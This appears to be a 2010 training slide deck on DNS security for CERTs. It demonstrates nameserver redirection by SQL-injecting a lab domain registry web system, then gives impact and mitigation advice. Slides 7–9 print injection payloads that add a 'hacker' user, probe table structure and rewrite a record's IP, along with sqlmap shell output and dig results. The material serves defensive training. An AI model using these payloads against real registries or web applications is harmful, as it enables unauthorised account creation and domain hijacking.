Upload
vngundi
View
597
Download
1
Tags:
Embed Size (px)
DESCRIPTION
Presentation by ICANN
Citation preview
DNS Security for CERTs- Attack Scenarios & Demonstrations –
NameServer Redirection
Chris EvansDelta Risk, LLC
7 March 2010
1
What You Will Need for the Exercise
• Please Watch the Live Demonstration in Front
– We will be targeting the web registry system
• You may need your Ubuntu VM to:
– Prior to attack, verify the Web Registry System URL: http://www.tld1 points to 192.168.101.50
– After attack, determine where http://www.tld1 points to
2
Description – NameServer Redirection
• Change of Registration or Delegation Data– Intentional
• Disgruntled employee changes registry data
• Outsiders pretending to be a customer request an “update” to their account
• Hackers change the registry database directly through web attacks
– Accidental• Untrained employee
• Typos in registry data
3
Domain1 NS 1.1.1.1
Domain2 NS 2.2.2.2
Domain3 NS 3.3.3.3 -> 5.5.5.5
Attacker now controls
resolutions for Domain3
Case Study
4
• SQL Injection Top List of Data Breach Attacks– SQL Injection used in 60% of all data breach attacks,
19% of all security breaches on the Internet
DarkReading.com
– Insecure programming techniques combined with proliferation of web based application = trouble
– Increase in automated techniques to detect and exploit vulnerabilities = double trouble
Case Study
• Summer of 2009, several African & Pacific ccTLD web-based registry systems were attacked through SQL injection
– Attackers created new user accounts within the system
– These accounts were used to modify existing registrations and re-delegate sites to malicious content
5
http://www.icann.org/en/security/sa-2009-0001.htm
Attack Demonstration
6
SELECT * FROM table WHERE username=‘mike
Your website is designed to perform a query during a
valid login attempt:
SQL Injection …. Well…. Injects SQL statements
into your backend database query:
SELECT * FROM table WHERE username=‘mike’ AND password=‘!QAZ2wsx’
‘; INSERT hacker INTO database
New SQL statement
injected….
…original SQL
statement gets
commented out “--”
Demonstration – Attacker View
7
One single ‘ nets:
table name and two variables
';insert into srs_users values(101,'hacker','password')--
Adds user hacker to the database…….
' group by srs_users.username having 1=1--
Reconaisance & Table Mapping...
Use SQL Injection tool to gain a shell to
the database <SQL-map>:sql-shell> select * from srs_regs where fqdn='rogue.tld1'
do you want to retrieve the SQL statement output? [Y/n] y
[15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where
fqdn='rogue.tld1''
[15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on
system databases, sqlmap is going to use 'public' schema as database name
[15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] retrieved: 9
[15:15:57] [INFO] retrieved: regid
[15:15:59] [INFO] retrieved: type
[15:16:01] [INFO] retrieved: fqdn
[15:16:03] [INFO] retrieved: ns
[15:16:04] [INFO] retrieved: ip
[15:16:06] [INFO] retrieved: recordtype
[15:16:10] [INFO] retrieved: hostname
[15:16:14] [INFO] retrieved: ownerid
[15:16:17] [INFO] retrieved: parentid
Demonstration – Attacker View (cont.)
8
Enumerating
the Database…
'; update srs_regs set (ip)=('192.168.85.5') where regid = 1 --
…then update a
record with bad IP…
Demonstration – Server View
9
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL:
0
;; QUESTION SECTION:
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.101.50
;; AUTHORITY SECTION:
Demonstration – User View
10
1
2
One minute
you get the
correct IP and
website…
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL:
0
;; QUESTION SECTION:
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.85.5
;; AUTHORITY SECTION:
…the next
you’re browsing
whatever the
hacker wants
you to!
Impact
• Registry suffers public relations hit, potential loss of customers & revenue
• Loss of brand reputation, customers, or revenue for registrants who are victimized
• Effect of attack persists even after detection and mitigation because of TTLs
11
Mitigation & Response Strategies
• SQL Injection
– Practice secure coding principles in any web-based application that has database connectivity
– Validate input and prevent “magic characters”
– Use an Web Application Firewall to filter/validate the input to your web application
– Use database logging to track queries and the pages they are being run on.
– Frequently audit your web applications (not just the systems they run on!)
12
Mitigation & Response Strategies
• Nameserver Redirection
– Multi-factor authentication of changes
– Out-of-band check of changes (e.g. phone, in-person)
– Domain “locks” which prevent updates unless manually approved
– Validation of changes before publishing new zone files
– Processes for contacting ISPs to “clear” cached entries
– Automated, continuous validation of published data with automated alerting
– Also see ICANN SSAC Report SAC040
13
Mitigation & Response Strategies
• Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim
14
A trusted entity, CERTs can encourage this type of
exchange within their communities
Questions?
15
?